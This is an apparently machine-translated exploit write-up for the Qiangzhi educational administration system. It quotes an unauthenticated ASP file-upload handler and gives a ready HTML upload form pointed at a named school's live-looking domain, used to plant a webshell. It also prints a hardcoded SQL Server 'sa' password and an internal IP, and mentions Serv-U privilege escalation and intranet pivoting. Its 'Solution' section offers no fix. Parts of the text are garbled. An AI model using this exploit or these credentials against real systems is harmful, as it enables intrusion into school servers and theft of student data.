Qiangzhi educational administration system kills Getshell (Elevation of Privilege server Intranet penetration)

Qiangzhi educational administration system kills Getshell (Elevation of Privilege server Intranet penetration)

File: unzip GL \ jcxx \ savetofile. asp

<% Option explicit %> <! -- # Include FILE = "upfile_class.asp" --> <% server. scriptTimeout = 0000000dim upfile, formPath, ServerPath, FSPath, formName, FileName, oFileset upfile = new upfile_class. getData (10240000) 'to obtain the uploaded data, maximum upload limit: 10 MB %> 

Use exp:

<Form method = "post" name = "form1" action = "http://e.tjmvti.cn/jwgl/jcxx/savetofile.asp" enctype = "multipart/form-data">
<Table border = "0" align = "center" cellpadding = "0" cellspacing = "0" width = "100%"> <tr> <td> <div align = "center "> <font color =" # 0000ff "size =" 4 "> <B> exp </B> </font> </div> </td> </tr> <tr> <td> <table width = "100%" border = "0" align = "center" cellpadding = "0" cellspacing = "0" bordercolor = "#111111" style = "BORDER-COLLAPSE: collapse "> <tr> <td height =" 27 "width =" 100 "colspan =" 5 "> & nbsp; </td> </tr> <td width = "750" colspan = "5"> <div id = "uptd"> </div> </td> </tr> <td height = "30" align = "middle" width = "50"> <input type = file name = uploadfile size = "100"> </td> <td height = "30" align = "middle" width = "100"> <p align = "center"> <input type = "submit" name = "Button2 "class =" bt "value =" Upload "> </td> <td height =" 30 "align =" middle "width =" 100 "> </td>/ tr> </table> </td> </tr> </table> </form>
 
Directly use exp.html to upload any file. The server has almost the sa permission, and the elevation of permission is complete.
 


Configuration file:
Conn \ connstring. asp <! -- # Include file = ".. /.. /connstring. asp "--> <% 'the above Code cannot delete ServerName = Request. serverVariables ("Server_Name ") programName = "jwgl" SName = "10.0.0.1" DBName = "TJMTI" DBBackDirName = "Dbback" if ProgramName = "" then ServerNameProgramName = ServerName else ServerNameProgramName = ServerName & "/" & ProgramName if Connstring = "" then connstring = "driver = {SQL server }; server = "& Sname &"; database = "& DBName &"; uid = sa; pwd = qzdatasoft123456789 "'database connection Statement %> the Administrator is still very smart, data and services are separated, but this has brought great harm to the later Intranet penetration,

Server Self-carried Serv-U Exec> Elevation of Privilege.
 


 


 



As you can see, the servers are all horse cells, and there are more threats than that.

Key statement: if Connstring = "" then connstring = "driver = {SQL server}; server =" & Sname & "; database =" & DBName & "; uid = sa; pwd = qzdatasoft123456789"
 
Directly escalate the IP address to the 10.0.0.1 server.
 


 


 



Well, here are other cases.
 


 


 
Solution:
Is this a small vendor?